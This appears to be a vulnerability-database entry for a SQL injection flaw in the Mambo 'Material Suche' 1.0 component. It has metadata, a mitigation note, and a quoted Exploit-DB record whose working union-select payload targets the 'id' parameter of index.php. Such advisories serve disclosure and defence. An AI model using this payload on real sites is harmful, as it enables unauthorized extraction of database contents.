Mambo Component Material Suche 1.0 SQL injection Vulnerability

vendor:

Mambo Component Material Suche

by:

Gamoscu

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Mambo Component Material Suche

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE: N/A

CPE: a:mambo:mambo_component_material_suche:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Mambo Component Material Suche 1.0 SQL injection Vulnerability

An attacker can inject malicious SQL queries via the 'id' parameter in the 'index.php' script. The vulnerable code is located in the 'com_materialsuche' component. The malicious SQL query can be used to extract information from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Sanitize user input and use parameterized queries.

Source

Exploit-DB raw data:

#############################################################
# Mambo Component Material Suche 1.0 SQL injection Vulnerability

# Author: Gamoscu

# Site: www.1923turk.biz

# Site: http://gamoscu.wordpress.com/

# Greetz: Manas58 Baybora Delibey Tiamo Psiko Turco infazci X-TRO
  
##############################################################

# Exploit:

   index.php?option=com_materialsuche&Itemid=70&tsk=detail&id=[SQL-inj]


  -1+union+select+1,2,3,version(),null,null,7,null,9,null,null,null,null,14,null,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31
     
##############################################################

Vatan Lafla De&#65533;il Eylemle Sevilir

Kiskananlar catlasin Zorunuza Gitmesin